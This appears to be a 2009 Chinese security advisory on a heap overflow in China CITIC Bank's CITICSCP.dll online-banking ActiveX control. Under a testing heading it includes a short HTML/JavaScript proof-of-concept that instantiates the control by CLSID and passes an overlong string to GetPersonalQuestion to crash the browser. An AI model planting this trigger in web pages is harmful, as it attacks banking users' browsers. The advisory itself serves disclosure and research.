当前位置: 安全纵横 > 安全公告

中信银行CITICSCP.dll网银控件远程堆溢出漏洞

更新日期:2009-01-04
受影响系统:
中信银行 CITICSCP.dll
描述:
CITICSCP.dll是使用中信银行的网银时所需安装的ActiveX控件。
CITICSCP.dll文件向系统注册了一个名为IMidInterface的控件接口。该接口主要负责的是银行证书的相关工作,其中包含很多用来操作网上银行证书的函数,如ExportCertificate、ImportPKCS12Certificate等,这些函数中堆溢出漏洞。如果用户受骗访问了恶意网页并向有漏洞的函数传送了超长的字符串类型的参数变量,就可以触发这个溢出,导致安装了中信银行网银控件的系统上浏览器自动崩溃。
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid="clsid:4BFE8042-A780-452F-AF17-9A424BE31B02" name="evil" ></object>
<script>
var a=Array(1244)+"vvvv"+"dddd"+"cccc"+"nnnn";
evil.GetPersonalQuestion(a);
</script>
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://bank.ecitic.com/